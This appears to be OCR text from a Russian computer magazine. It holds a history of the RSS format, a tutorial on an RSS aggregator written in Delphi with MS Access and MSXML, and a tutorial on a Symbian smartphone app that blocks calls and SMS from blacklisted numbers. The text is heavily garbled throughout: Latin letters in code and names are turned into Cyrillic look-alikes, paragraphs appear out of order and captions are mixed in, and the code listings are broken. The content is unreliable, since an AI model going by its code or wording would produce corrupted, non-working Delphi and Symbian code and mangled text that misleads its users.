информацию, скажем, с форума, гостевой книги и т.д. 

8 НЕМНОГО ИСТОРИИ 

Впервые в истории мысли о подобной технологии распределения инфор- 
мации возникли у мозговитых парней из компании ІІзег 1_апсІ, которые в 
1997 году зарелизили свой формат — зегірбпд пеѵѵз. Формат получился 
неплохим, но не прижился. Причем не прижился по вине всем известной 
компании ЫеІБсаре. Вто время она выступала законодателем моды в мире 
интернет-технологий, и конкурировать с ней было довольно тяжело. Пару 
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’езул ьтат на ш е го труд; 



ПРИМЕРФАЙЛАС НОВОСТЯМИ 

<?хш1 ѵегзіоп= " 1 . О " епсо<ііпд= 'Ѵіпскжз-1251 м ?> 
<г з з ѵег з іоп= " 2 . О " > 

<сЬаппе1> 

<кік1е>Мой супере айт</1:і к 1е> 

<1іпк>ЪР1:р : //тузіке . сот</1іпк> 

<сіезсгір1:іоп>Все , что вам нужно, есть здесь ?</ 
йевсгірЪіап> 

</с1іаппе1> 

<ікегп> 

<кі1:1е>Новость 1</ЬіЫе> 

<1іпк>Ы;1:р : //шузіЬе . сош/пеѵ/зі . кхк</1іпк> 
<(1езсгірЦіоп>Сегодня открылся мой сайте/ 
йезсгірРіоп> 

<риЬБаЬе>Ргі , 15 аид 2007 +1100</риЬБаЬе> 
<аиЦЬог>Зрісіег_ЫЕТ</аик]іог> 

</ікеш> 

</гзз> 



легли идеи версии 0.9. Версия 1 .0 начала набирать обороты... и опять-таки 
не получила широкого признания в компьютерном сообществе по причи- 
нам, затормозившим распространение версии 0.9. 

2002 год становится золотым годом для В55. Компания ІІвег І_апсІ 
выпускает вторую версию (2.0) этой замечательной технологии, и 
уже она порождает самый настоящий бум в сфере интернет-тех- 
нологий. Многие ѵѵеЬ- раз работники оценили ее привлекатель- 
ность и начали использовать в своих проектах. Через год в рамках 
лицензии Сгеаііѵе Сотглопв становится доступной спецификация к 
формату Н55 2.0. 



И К55 ИЗНУТРИ 

Сточки зрения программиста лента Р55 представляетсобой обычный 
хті-подобный файл. В нем содержатся определенные спецификацией эле- 
менты. Обо всех нихты сможешь прочитать в документации, мы рассмотрим 
только основные: 

<Г55> — элементопределяет начало ленты новостей. В этом элементе 
необходимо указывать версию формата. Например, <гбз ѵегвіоп=”2.0'’> 
определяет вторую версию формата. 

<сЬаппеІ> — информация о новостном канале. В этом элементе ты 
можешь установить заголовок сайта (<Ш1е>), ссылку (<1іпк>), описание 
(<сІе5сгірбоп>) и язык(<1апдиаде>). 

<іІет> — в элементе задается информация о публикуемой новости. Всю 
необходимую инфу нужно задавать с помощью тех же элементов, которые 
используются в <сИаппеІ>. 

Для того чтобы лучше разобраться с форматом, посмотри вот сюда: 



лет спустя выходит разработанный на основе зегірбпд пеѵѵз формат Н55 
0.9. Как ни странно, его разработчиком стала сама Ыеізсаре. Формат начал 
постепенно вливаться в массы, но многие сочли его слишком сложным 
и неудобным, поэтому Ыеівсаре ничего не оставалось, какзаняться его 
совершенствованием. В результате была выпущена версия 0.9.1 . На этот 
раз формат получился достаточно гибким и в то же время более простым 
в использовании. Ксожалению, и новый релиз не смогзавоевать сердца 
ѵѵеЬ-разработчиков. В итоге Ыеівсаре решаетсвернуть разработку Н55 и 
сосредоточить свои усилия на других проектах. Разумеется, наработки по 
проекту не были выброшены на свалку — право на разработку и развитие 
этого проекта было переданоуже упоминавшейся компании Ивет І_апсІ. Все 
те же мозговитые парни стали активно совершенствовать формат и спустя 
некоторое время явили миру версию 0.9.2. 

Втоже самое время организация Р55-0еѵѴ\/огкіпд бгоир, борющаяся за 
сохранение формата версии 0.9, выпустила версию 1 .0, в основу которой 
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X ФОРМА ПРОГРАММЫ 

Программировать свой Р55-агрегатор мы будем на великом и могучем 
беІрЬі (редактор согласился опубликовать статью, только если я ис- 
пользую не менее 1 0 хвалебных эпитетов в адрес беІрЬі на 10 килобайт 
плайн-текста :(), поэтому запускай эту ШЕ и рисуй форму,. В верхней 
части формы уменя расположена панель с управляющими кнопками, 
чуть ниже — ОЬбгісІ (необходим для отображения данных из БД) и в 
самом низу — бВМето (в нем будет отображаться текст новости). Я 
упомянул о базе данных. Сегодняшний пример действительно будет 
работать с базой данных. Гораздо лучше хранить и править все новости 
в БД, чем мучиться с текстовыми файлами. Тем более что, используя 
БД, ты всегда можешь с легкостью организовать поиск нужной новости 
и много чего еще. В качестве базы данных мы будем использовать М5 
Ассевв. 

X СОЗДАЕМ БД 

С выбором БД мы определились, теперь самое время ее создать и подклю- 
чить к беІрЬі. Запускай М5 Асеева, создавай новую БД, сохраняй ее куда- 
нибудь и переходи ксозданиютаблицы в режиме конструктора. 

В таблице нам потребуется 6 полей: 

ісі — счетчик, ключевое поле (уникальное поле); 

Шіе — текстовый (заголовок новости); 

Ііпк — текстовый (ссылка на новость); 
сіевсгірбоп — текстовый (поле МЕМО); 
аігіЬог — текстовый (автор новости); 

риЬбаІе —текстовый (дата новости; можно было задать в качестветипа 
«Дата/Время», но, чтобы не напрягаться с преобразованием даты, указыва- 
емтекстовый). 

Сохраняем таблицу. В качестве имени я указал гвв. На этом этапе можно 
закрыть Ассевв и возвратиться к ОеІрЫ. Кидай на форму АЬоТаЫе (АбО) и 
баІаБоигсе (баіа Ассевв). Выбирай сначала компонент баІаБоигсе и в свой- 
стве баІаБеІ: — АЬоТаЫе. Теперь пришла очередь центрового компонента 
при работес БД — АЬоТаЫе. Дважды кликай по свойству СоппесбопБігіпд. 
Перед тобой появится окошко, в котором тебе нужно нажать пимпу Виіісі. На 



Метод 


Значение 


і_оао(ііві.) 


Загружает хмі_-документ 


і-оарХМ I. (хмі_5твше) 


Сохраняет документ в файл 


5аѵе (тавѳерЗтв) 


Добавление нового элемента 


СреатеЕьемемт (маме) 


Добавление нового элемента 


СреатеТехтЫоре ітехт) 


Запись текста в документы/элемент 


СреатеАттрівіяе Ыаме) 


Установка атрибутов для элемента 


5еі_ест5шоі.еМоое іраттер№трімо) 


Ссылка на объект ти па ІХМЮОМЫооеі-ібт 


СеомеЫоре (реер) 


Копирование текущего элемента 



экране отобразится форма, в ней необходимо настроить подключение к БД. 
Сначала перейди на закладку «Поставщикданных» и среди провайдеров 
найди МісгозоЙ 4.0 ОБЕ 6В Ргоѵібег. Выделяй и жми «Далее». В поле вы- 
бора БД введи имя или путь к создан ной БД. Если ты сохранил базу в папку 
с программой, то в этом поле просто укажи ее имя. Тактвоя база не будет 
привязана к какому-то определенному пути, а всегда будет искаться в папке 
с программой. Установи флажок«Пустой пароль». Это необходимо для того, 
чтобы постоянно не выскакивало окошко с просьбой его ввода. 

Итак, все готово, можно протестировать подключение. Нажми на кнопку 
«Проверить подключение». Если не было допущено ошибок, то ты увидишь 
сообщение стекстом: «Проверка подключения выполнена». В противном 
случае тебе придется перечитать часть статьи заново. Возвращайся к 
форме и быстренько выделяй компоненты ОЬбгісІ и ОЬМето. В объектном 
инспекторе ищи свойство баІаБоигсе и выбирай в нем ба1:а5оигсе1 . Теперь 
эти компоненты связаны с нашей таблицей, а значит, в них будут отобра- 
жаться данные из БД. 

Теперь все готово для того, чтобы установить активность нашей таб- 
лицы. Опять же выбирай АбоТаЫе, в свойстве ТаЫеІМате находи нашу 
таблицу, свойство Асііѵе выставляй в Ігие. В ОЬбгісІ должны появиться 
колонки с именами созданных нами полей. Отображать все поля в 
ОЬбгісІ нам абсолютно ни к чему, поэтому 2 раза кликай по компоненту 
АЬоТаЫе и в появившемся окне нажимай <СігІ-Р> (можно просто клик- 
нуть правой клавишей крысы в области окна и выбрать АЬЬАИРіеІсІз). 
Окно заполнится именами полей. Выдели любое имя поля, и его свой- 
ства моментально отобразятся в объектном инспекторе. Наибольшего 
внимания заслуживают: 

біврІауЕаЬеІ — название, которое будет отображаться в заголовке колонки 
ОЬбгісІ. Указывай здесь нормальные имена. 

біврІауѴѴісБЬ — ширина колонки. Поумолчанию ширина колонки в ОЬбгісІ 
равна размеру поля. В большинстве случае это неудобно, поэтому лучше 
указать размер вручную. 

Ыате — имя для доступа к полю. 

ѴізіЫе — видимость поля. 

В своем примере я дал всем полям нормальные имена, поменял раз- 
мерность и сделал невидимыми поля бевсгірбоп и Ю. Значение поля 
бевегірбопу нас будет отображаться в ОЬМето, а значение Ю видеть 
вообще не нужно. 

В ИМПОРТИРУЕМ К55 

Для импорта новостей нам придется открыть файл с новостями и 
про парсить его, вытаскивая информацию о них. Названия наиболее 
важных элементов формата Р55 я описал, поэтому можешь написать 
парсер самостоятельно. Но минусы подобного пути — муторность 
отладки и проблемы с совместимостью. Другой способ решения 
этой задачи предусматривает использование готового хті-парсе- 
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ра. Их достаточно много, поэтому есть из чего выбрать. Для на- 
шего примера мы так и сделаем — воспользуемся разработкой от 
М іеговой — М5ХМІ_. Модуль для работы с этим парсером уже есть 
в составе ОеІрЫ, поэтому тебе не придется ничего дополнительно 
качать и устанавливать. Работа с парсером происходит через объект 
ХМЕООМОоситепЕ Объект имеет множество методов, наиболее 
важные их них перечислены в таблице. 

Как я уже сказал, методов достаточно много, поэтому, если тебе 
потребуется узнать о предназначении того или иного метода/ 
свойства, то не поленись заглянуть в библиотеку тзбп. В ней 
найдешь ответы на все вопросы. Код импорта новостей из файла 
приведен чуть ниже. Перепиши весь код и возвращайся сюда 
за объяснением. Перед переписыванием не забудь подключить 
модуль М5ХМИ и АсбѵеХ. 



ИМПОРТНОВОСТЕЙ 

ѵаг 

_гз8_СІОС : ІХМЬБОМБоситепІ: ; 

_посЗе: ІХМЬБОШойе ; 
і : Іпбедег ; 

Ьедіп 

іі поб (орепБіаІодІ . Ехесибе) бЪ.еп Ехіб; 

/ /Инициализция 

_гзз_сІос : ^СоБотБоситепб . Сгеабе ; 

_гзз_бос . азупс : =ба1зе; 

//Загружаем документ 

_гзз_бос . Іоасі (ОрепБіаІодІ . ЕіІеЫаше) ; 

//Если возникла ошибка, то показываем сообщение 
іі _гзз_бос .рагзеЕггог . еггогСобеоО Ыке 

Ьедіп 

ЗЪомМеззаде ( 'При загрузке файла произошла ошибка! 1 + 
#13#10 + 'Кодошибки: ' + ІпбТоЗбг (_гзз_сіос . 
рагзеЕггог . еггогСобе) + #13 #10 + 'Текст ошибки: ' + 
_гзз_бос .рагзеЕггог . геазоп + #13 #10 + 'Строка с ошиб- 
кой: ' + ІпбТоЗбг (_гзз_сІос .рагзеЕггог . Ііпе) + #13#10 
+ 'Символ в строке с ошибкой: ' + ІпбТоЗбг (_гзз_сІос . 
рагзеЕггог . Ііпероз) ) ; 

СоШІпібіаІіге; 

Ехіб; 

епб; 



//Получаем доступ к элементу гзз 

_посІе : = _гзз_бос . зеІесбЗіпдІеЫосІе ( ' / /гзз ' ) ; 

//В цикле получаем каждую новость 
бот і : =0 бо _побе . зеІесбЫосІез ( ' //ібет' ) . 1епдбЪ-1 

Ьедіп 

бгу 

абобаЫеІ . Іпзегб ; 

бібіе .ѵаіие : =_побе . зеіесбпосіез ( 1 //ібет' ) . ібет[і] . 
зеІесбЗіпдІеЫосІе ( ’бібіе' ) . Техб; 

Ііпк. ѵаіие : =_побе . зеіесбпобез ( ' //ібет' ) . ібет[і] . 
зеІесбЗіпдІеЫосІе ( 'Ііпк' ) . Техб; 

сіезсгірбіоп. Ѵаіие : =_пос!е . зеіесбпосіез ( ' / /ібет' ) . 
ібет[і] . зе1есбЗіпд1е№эсІе ( ' безегірбіоп' ) . Техб; 

риЬБабе .Ѵаіие : =_пос!е . зеіесбпосіез (' //ібет' ) . ібет[і] . 
зеІесбЗіпдІеИосІе ( 'риЪБабе' ) . Техб; 

аибЪог. Ѵаіие : =_посІе. зеіесбпосіез (' //ібет' ) . ібет[і] . 
зеІесбЗіпдІеЫосІе ( 'аиббюг' ) . Техб; 
асІобаЫеІ . Розб ; асІобаЫеІ . Розб ; 
ехсерб 
Епсі; 
епсі; 



Перед тем как начать парсить, нам нужно инициализировать 
объект типа ІХМЮотОоситепІ:. В моем случае это переменная 
_Г55_сІ ос . Инициализация происходит стандартным способом 
— посредством вызова метода Сгеаіе у сокласса СоОотОоситепб 
После инициализации необходимо отключить асинхронный режим. 
Для нашего примера он не пригодится. Теперь надо попытаться 
выполнить саму загрузку. Загрузка выполняется с помощью метода 
Іоасі. В качестве параметра ему нужно передать имя файла, кото- 
рый и будет загружен. Загрузив файл, парсер начнет проверять его 
на корректность. В случае нахождения ошибок процесс парсинга 
прервется, и нам придется показать сообщение об ошибке, осво- 
бодить выделенную память и остановить дальнейшее выполнение 
процедуры. 

При возникновении ошибки есть возможность показать дополнительные 
сведения, которые помогут исправить документ, и попробовать загру- 
зить его снова. В качестве таковых я показываю кодошибки (рагзеЕггог. 
еггогСобе), текстошибки (рагзеЕггог.геазоп), номер строки с ошиб- 
кой (рагзеЕггог.Ііпе) и символ в строке, с которого начинается ошибка 
(рагзеЕггог.Ііпероз). Располагая этой информацией, легко найти и испра- 
вить ошибку. 

Вернемся кнашему коду и представим, что никакихошибокне возникло, 
и следовательно, нам можно начинать выдергивать новости. В перемен- 
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Тот самый значок 




ную_пос!е мы получаем ссылку на элемент <гзз>. Для получения ссылки я 
использую метод ЗеІесіБіпдІеМосІе. 



пойе : = _гзз_йос . зеІесЬЗіпдІеЫойе ( ' / /гзз ' ) 



В качестве единственного параметра ему нужно передать имя элемента. 
Получив родительский элемент, мы запросто сможем обратиться клюбому 
дочернему (вспомни структуру Н55-файла, все имеющиеся элементы/тэги 
как раз и являются дочерними по отношению к <гбз>). Каждая новость в 
П55 — это отдельный блок <йет>. Чтобы узнать количество определенных 
элементов в хті- документе, нужно заглянуть в свойство ІепдіЬ. Например, 
чтобы посмотреть, сколько всего в документе элементов Ше, стоит обра- 
титься к ІепдіЬ таким образом: 



пойе . зеІесЫКэйез ( ' //ЫЫе ' ) . ІепдСЬ 



Также я узнаю, сколько всего в документе элементов <іІет>. Зная их 
количество, легко написать цикл, в котором реализуется последовательный 
перебор всех элементов и получение заключенной в них информации. По- 
сле запуска цикла начинается самое интересное — чтение самих новостей 
и ихдальнейшее их сохранение. Поскольку все данные мы договорились 
хранить в БД, то, перед тем как в нее что-то добавить, необходимо вызвать 
метод Іпзегі нашей таблицы: 



айобаЫе! . ІпзегЬ ; 



При вызове этого метода в таблице создается новая пустая запись. Нам 
лишьостается заполнить все поля. В качествезначения для поля бИе (заго- 
ловок] я присваиваю содержимое элемента Ше текущего элемента ііет. 



пойе . зеіескпойез ( ' / / ікет ' ) . іСет [ і ] . зеІескЗіпдІеЫойе ( 



Остальные поля получаютзначениятемже способом. Когда все поля будут 
заполнены, желательно сохранить внесенные в таблицу изменения. Для 
этого я вызываю метод розі компонента абоТаЫе. 

X ЭКСПОРТ НОВОСТЕЙ В К55 

Произвести импорт новостей нам любезно помог парсер от дяди Билла. 
Экспорт новостей из базы в файл можно осуществить таким же спосо- 
бом. Все, что тебе потребуется, — это немного времени на разбор мето- 
дов: СгеаІеЕІетепД], СгеаІеТехШосІеП, СгеаІеАигіЬиЫ), Сгеа1:еІ\ІосІе(). 
Работа с этими методами ничуть не сложна, кроме того, все нюансы 
расписаны в тзсіп. Поэтому экспорт новостей описанным способом 
я оставляю под твою ответственность. В крайнем случае ты всегда 
можешь задать мне вопрос по мылу. В своем примере экспорт 
новостей я организовал более простым способом. Наиболее 
важные моменты кода приведены ниже. Весь процесс организо- 
ван на стандартных функциях добавления/сохранения текста в 
файл. Комментарии излишни. Единственное, на что стоит обра- 
тить внимание, — это перебор всех записей в таблице нашей БД. 
Количество записей хранится в свойстве РесогбСоипЕ Перед тем 
как перебирать записи, нужно установить курсор на самую первую. 
Это делается с помощью метода РІГ5І компонента АбоТаЫе. После 



чтения значений всех полей очередной записи, нужно передвинуть 
курсор, иначе мы постоянно будем получать одни и те же значения. 
Переход на следующую запись осуществляется методом Ыехі все 
того же АбоТаЫе. 



ЭКСПОРТ НОВОСТЕЙ В ФАЙЛ 

_Ьеайег : збгіпд ; 

_ЬоЬЬот: збгіпд; 

_гзз_бі1е : ТЗбгіпдЬізІ: ; 

_Ьетр:ДОійез1:гіпд; 
і : іпСедег; 

Ьедіп 

_Ьеайег : = ' <?хт1 ѵегзіоп= "1.0" 

епсойіпд= "міпскжз-1251 " ?> ' + #13#10 + 

'<гзз ѵегзіоп="2 . 0"> ' + #13#10 + 

'<с1іаппе1>' + #13 #10 + 

' <ЪіЬІе>Новости моего суперпортала</1:і1:1е> ' + 
#13#10 + 

' <1іпк>Ы:Ьр : / /ѵг-опііпе . ги</1іпк> ' + #13#10 + 

' <йезсгіркіоп>Суперпопулярный канал 
</йезсгір1:іоп> ' + #13#10 + 

' <1азЬВиі1йВаЬе>5ип, 05 Аид 2007 07:30:01 +0400</ 
1азЬВиі1йВаСе> ' + #13#10 + 

' <Ш1>1</Ш1> ' ; 

айоТаЫеІ . Рігзб ; 

іог і : =0 1 :о айоТаЫеІ .КесогйСошгЬ-1 йо 
Ьедіп 

_Ьешр: = ' <іЬегп> ' + #13#10 + 

'<ЬіЫе>' + СІеагТехЬ (ЫЫе . АзЗбгіпд) + '</ 

ЫЫе>' + #13#10 + '<1іпк>' + СІеагТехЬ (Ііпк. АзЗбгіпд) + 
1 </1іпк> ' + #13#10 + 

1 <йезсгір1:іоп> ' +С1еагТехР (йезсгірЬіоп. 

АзЗЬгіпд) + '</йезсгірЬіоп>' + #13#10+ 

1 <аиЬЬ.ог>' + аиСЬог . АзЗбгіпд + ' </аибЬ.ог> 1 + 

#13#10 + ' <риЪВаСе>' + риЪВаСе . АзЗЬгіпд + ' </риЪВаСе> ' 

+ #13#10+ 'с/іРепи»'; 

_гзз_і:і1е . Айй (_Ьетр) ; 
айоТаЫеІ . Ыехк ; 

епй; 



Н СОйІЫО СОМРЬЕТЕ 

Итак, твой первый Р55- агрегатор готов, надо начинать тестить. В ка- 
честве теста попробуем скормить ему файл с лентой новостей сайта 
твоего любимого журнала ( ѵѵѵѵѵѵ.хакер.ги і. Берем качалку (причем 
не любую, а свою — читай статью «ОеІрЬі для качков») и сохраня- 
ем данные с ѵѵмѵѵ.хакер.ги/агЬсІез/гзз/сІеіеиІІ.азрЗгзз саі=розІ . 
Получившийся файл пробуем открыть в нашей программе. В случае 
отсутствия ошибок твоя база да иных заполнится последними ново- 
стя м и ѵѵѵѵѵѵ.хакер.ги . тг 
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ЛЕДИ 
В ЧЕРНОМ 






Довелось мне как-то подвергнуться жестокой 
ОБоЗ-атаке посредством звонков и зтз’ок 
от одной назойливой барышни. В тот вечер, 
сидя в одном московском кабаке с другом, мы 
обратили внимание на тот факт, что произ- 
водители смартфонов пичкают свои девайсы 
чем угодно, но только не реально полезным 
софтом. В частности, что мешало ]\Гокіа уста- 
навливать на свои смартфоны бизнес-серии 
программу, фильтрующую вызовы с опреде- 
ленных номеров? Предлагаю восполнить этот 
пробел финского гиганта прямо сейчас! 




т функционал 

Думаю, с инструментарием разработки подЗутЬіапты уже знаком по на- 
шим предыдущим статьям, посвященным этой теме (если нет, то отложи этот 
номер и ознакомься с сентябрьским и декабрьским «Кодингом» за прошлый 
год). В своих экспериментах мы традиционно ориентируемся на смартфоны 
ЗегіезбО. Если ты хочешь писать под новое поколение смартов на ЗутЬіап 
9.Х, то рекомендую поставить соответствующий ЗйК. Функционал у нас 
будет следующий: приложение должно блокировать входящие зтз/ттз, а 
также звонки с определенных номеров. 

№ НАЧИНАЕМ КОДИТЬ 

Приступим креализации. Очевидно, что наше приложение должно иметь 
модульную структуру, иначе код превратится в кровавое месиво, что часто 
случается с плохо спроектированными проектами под ЗутЬіап. Не забывай, 
что С++ сам по себе благоприятствует созданию неудобоваримого для пони- 
мания кода, а в совокупности с извращенностью ЗутЬіап-парадигм в уме- 
лых руках это дает поразительной кривизны результат:). Поэтому предлагаю 
разбить функционал на модули (смотри рисунок «Структура приложения»). 
Посмотрим, что должен делать каждый из модулей по отдельности: 
Меззадіпд тобиіе: 

• отлов событий «Входящее зтз/ттв»; 

• определение номера, с которого пришло входящее зтз/ттз; 



• удаление зтз/ттз при условии, что номер занесен в базу данных 
Ыаск ІІ5І. 

Теіербопу тобиіе: 

• отлов события «Входящий вызов»; 

• определение номера звонящего; 

• сброс вызова при условии, что номер занесен в базу данных Ыаск ІізЕ 
Асісігезз Воок гпосіиіе: 

• интерфейс выбора контакта из адресной книги; 

• запоминание в базу данных Ыаск Іізі номера выбранного контакта. 
ВІаскІ_І5І Епдіпе тобиіе: 

• интерфейс ввода номера для добавления в базу данных Ыаск Из!; 

• ведение базы данных Ыаск Іізі и предоставление интерфейса к ней. 
Обрати внимание на то, что модули Меззадіпд тобиіе и ТеІерЬопу тобиіе 
по большому счету являются универсальными и могутбыть задействованы 
практически влюбом приложении, использующем возможности телефонии 
смартфона. 

Выбор способа хранениятелефонов неудачников я предоставлю тебе 
— можно использовать встроенные классы для хранения данных, ХМІ_или 
вообще держать их в текстовом файле. Для ясности изложения будем рас- 
сматривать последний вариант, а заодно и разберем работу со строковыми 
дескрипторами. 

Посмотрим на реализацию каждого модуля в отдельности. 



► ііб 
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Полный код класса СМеззадіпдЕпдіпеты можешь найти на диске. Созда- 
вать экземпляр класса нужно в конструкторе класса АррІІі нашего приложе- 
ния следующим образом: 



іМеззадіпдЕпдіпе = СМеззадіпдЕпдіпе : :Ыетл7Ь() 




X МЕ55А6ІЫ6 ЕЫСІЫЕ 

Этот модуль будет состоять из одного класса, являющегося так называемым 
классом Асбѵе О^'есЕ Асбѵе 0Ь|есі:5 введены в ЭутЬіап для поддержки 
асинхронного выполнения. В частности, подобные объекты используются 
в тех случаях, когда их работа связана с выполнением продолжитель- 
ных операций, во время которых работа приложения в целом не должна 
останавливаться. Кроме того, класс СМеззадіпдЕпдіпе будет унаследован 
от ММзѵЭеззіопОЬзегѵег. Вообще в ЭутЬіап довольно много оЬзегѵег- 
классов, использующихся для отлова определенных событий (как в нашем 
случае). Обычно используется конструкция вида: 



ѵоісі НапйІеЗотеЫііпд (...) 

{ 

зиібсЬ (аЕѵепі; ) 

{ 

// ... ловим события 

} 

} 



В этом примере мы отлавливаем создание новой зтз’ки в папке «Входя- 
щие», определяем номер, с которого она пришла, и удаляем ее, если этот 
номер присутствует в базе лузеров. 



Здесь мы вызываем стандартный симбиановский конструктор, о котором 
тебе стоит почитать в 50К (раздел І_еаѵіпд Рипсбопз). 

После создания объекта наше приложение в состоянии отлавливать 
события входящих 51715 и гпгпз. Остается решить вопрос их обработки. 

Для этого в методе НапсЦеЭеззіопЕѵепіЦ...) класса мы отловим событие 
ЕМзѵЕпітіезСгеаІесІ, которое возникает при создании нового сообще- 
ния (причем неважно где: в папке «Входящие», «Черновики» и т.д.). 
НапсІІеЗеззіопЕѵепІ: имеет4 параметра: первый служит для обозначения 
события и имееттип ТМзѵЭеззіопЕѵепі:, а три других бестиповые (ТАпу*) и 
служат для передачи служебной информации. В частности, для события 
ЕМзѵЕпігіезСгеаіесІ один из этих параметров содержит Ю директории, где 
была создана новая зтз/ттз, а другой является указателем на множество 
вновь созданных сообщений. Код отлова сообщения выглядит следующим 
образом: 



КОД ОТЛОВА И УДАЛЕНИЯ НЕП0ТРЕБНЫХ5М5 

ѵоісі СМбтзЕхашрІеЕпдіпе : :Напб1еЗеззіопЕѵепі:Ь ( 
ТМзѵЗеззіопЕѵепб аЕѵепі: , ТАпу* аАгдІ, 

ТАпу* аАгд2 , ТАпу* аАгдЗ ) 

{ 

зтбсЪ. ( аЕѵепі: ) 

{ 

сазе ЕМзѵЕпбгіезСгеабесІ: 

// проверяем, что сообщение создано 
//в папке «Входящие» 
іі ( *зі:аі:іс_сазі:<ТМзѵІсІ*> (аАгд2 ) == 
КМзѵСІоЪаІІпВохІпсіехЕпбгуІсі) 

{ 

// инициализируем массив вновь созданных зшз 
СМзѵЕпбгуЗеІесбіоп* епбгіез = 
зСаі:іс_сазі:<СМзѵЕпі:гуЗе1есі:іоп*> (аАгдІ) ; 

// получаем ІБ первой созданной зшз из массива 
// (проще говоря, айди новой зшз) 

ТМзѵІб іЫеѵ/МеззадеІб = епбгіез->Аі: (0) ; 

ТМзѵІб ошпіпдЗегѵісеІб; 

//объект зшз ' ки 
ТМзѵЕпбгу шеззадеЕпбгу ; 

іЗеззіоп->Сеі:Епі:гу ( (*еп1:гіез) [епі:гіез->Соипі: ( ) -1] , 
оѵтпіпдЗегѵісеІб, шеззадеЕпбгу ) ; 

ТМзѵІб іЗшзісі = теззадеЕпбгу . Іб. ( ) ; 
іЗтзМі:т->8тоіЬсЪСиггепі:ЕпЪгуЬ ( іЗтзІб) ; 

// строковый дескриптор, куда записывается номер 
// отправителя сообщения 
ТВиб<20> зепбегЫшпЪег ; 
зепбегШтЬег . Аррепб ( 
іЗшзМСт->Епі:гу ( ) . Епбгу ( ) . іБебаіІз ) ; 

// если номер есть в базе, удаляем 
і і ( іВЬЕпдіпе . СЬескЫшлЬег ( зепбегЫишЪег ) 
БеІебеМеззадеЬ (іЗтзІб) ; 

} 

} 

} 



В приведенном коде задействован метод СЬескМитЬег(ТОезС& аЫитЬег) 
класса СВЕЕпдіпе, который мы рассмотрим позже. С остальным кодом ты 
можешь ознакомиться в проекте на диске. 

Ш ТЕЬЕРНОЫУ ЕЫ6ІЫЕ 

Принцип работы этого модуля в точности повторяет принцип работы пре- 
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Отличная книжка для разработчика под ЗутЬіап 



Примерно так будет выглядеть экран смарт- 
фона во время звонков надоевших девицИ 




> Ііпкз 

Массу полезной 
информации можно 
найти на іогшп. 
покіа.сот . 



дыдущего, разница лишь в классах и втом, что для создания 
и инициализации движка требуется несколько большетело- 
движений. Код его я бы посоветовал попробовать сочинить 
самому, а если не получится — мой исходник всегда ктвоим 
услугам :). 

X РЕАЛИЗАЦИЯ ДВИЖКА ВІ_АСКІ_І5Т 

Поскольку с вопросами отлова события и их блокирования мы 
определились, приступим к созданию основного функцио- 
нала, который прост какЗ копейки: нам нужно научиться 
формироватьсписокотстойных номеров и делать к нему ин- 
терфейс, позволяющий проверять, естьли конкретный номер 
в этом списке. Поскольку мы условились держать номера в 
обычном текстовом файле, то суть описанного выше сводится 
к добавлению строк в этот файл и их поиску. Для работы с 
файловой системой в ЗутЬіап имеется класс РРіІе. Тем не 
менее процедура считывания данных из файла или записи в 
файл занимает, на мой взгляд, слишком много места, поэтому 
для дальнейших выкладок мы будем использовать файловый 
движок, который ты сможешь найти на йѴй и который можно 
использовать в любых ЗегіезбО-проектах. Рассмотрим функ- 
цию добавления данных в файл: 



ѵоісі СРіІеЕпдіпе: :Асіс1Ваба( 

ТВезС &аРі1еЫаше, ТБезС &аВаба, 
ТВооІ аЫеѵ/Ьіпе) 

{ 

//строковый Ьеар -дескриптор 
НВибС* БаСа=НВибС : :Ыеѵ^ЬС( 



б1ііз->СебРі1е5І2е (аРіІеЫаше) + 
аВаба . ЬепдбЪ. ( ) +3 ) ; 
іб (бЬ.із->РіпсІРі1е (аРіІеЫате) ) 

{ 

бЫз->КеасІВаба (аРіІеЫаше , 

Ваба->Вез ( ) ) ; 
іб (аЫеѵ/Біпе) 

{ 

Ваба->Вез ( ) . орегабог += (_Ь ( " \п" ) ) ; 

} 

} 

еізе 

{ 

Баба->Без ( ) . Сору (_Ь ("")); 

} 

Баба->Без() .орегабог += (аВаба) ; 
бМз->Мгл_беВаба (аРі1еЫате,Ваба->Вез ( ) ) ; 

} 



Как видишь, параметрами функции являются имя файла, в 
который добавляем данные, строковый дескриптор, содержа- 
щий строку данных, и флаг, показывающий, фигачить ли дан- 
ные в конец файла или добавлять перед этим символ переноса 
строки. Особый интерес представляет в этом коде дескриптор 
Оаіа, являющийся структурой, содержащей размер данных и 
ссылку на них. В начале выполнения функции мы выделяем 
подданные суммарный размеруже хранящихся данных в 
файле БД и данных к добавлению. После этого мы считываем 
в него данные из файла базы, добавляем к ним записываемый 
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Структура приложения 



номер и загоняем все это дело обратно в файл БД. Механизм, конечно, 
кривенький, зато простой и эффективный. При этом в методе ѴѴгіІеОаІа 
того же файлового движка выполняются манипуляции по поиску файла, 
его открытию, назначения соответствующих флагов и т.д. 

Для формирования собственно БД можно использовать2 метода: зада- 
ние номера вручную и с помощью доступа кадресной книге смартфона. 
Второй способ предпочтительнее, поскольку он более изег-^гіепсііу. Что 
приятно, в ЗутЬіап есть встроенный механизм доступа кдвижку адрес- 
ной книги. В частности, с помощью класса СРЬкСопіасіЕпдіпеты мо- 
жешь получить доступ кзаписям, редактировать их и добавлять новые. 

В нашем случае нас интересует показ диалога со списком контактов 
для предоставления пользователю возможности выбора необходимого 
контакта. После выбора нужно занести номер контакта в черный список. 
Соответствующий код несколько нетривиален и с первого взгляда 
сложен для понимания. Полностью и ясно откомментированный сорец, 
конечно же, я тебе подготовил :). 

После создания базы данных контактов наше приложение будет 
работать в фоновом режиме и ожидать поступления входящих вызовов 
и сообщений. При обнаружении таковых оно получитлибо номеротпра- 
вителя, либо номер звонящего. После этого вызывается упомянутый 
выше метод СЬескМитЬег(Т0е5С& аЫитЬег) класса СВБЕпдіпе. 

В нем мы делаем следующий финтушами: записываем содержимое 
файла БД в один строковый дескриптор, после чего ищем в нем под- 
строку аЫитЬег. Если строка найдена, значитномерзанесен в черный 
список. В этом случае мы его блокируем. Поиск подстроки выполняется 
следующим образом: 




АБОНЕНТ ВСЕГДА Б ВЫИГРЫШЕ! 
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ТВиб< 50 > ІР (_Ь ( "С : \ \ 1 изегз_Ъсі" ) ) ; 

НВибС* ЕіІеБаСа^НВибС : :Ыеѵ 7 Ь( 

іРі 1 еЕпдіпе->СеСГі 1 е 5 І 2 е ( іР) ) ; 
іРі 1 еЕпдіпе->В.еасІВаСа ( іР , Еі 1 еВаСа->Без ( ) ) ; 
і е ( Еі 1 еВаДа->Без ( ) . Ріпсі (аЫишЬег ) ! =КЕг^оДРоипсі) 
геСигп ЕТгие; 



МОТОЗАМЕН А 



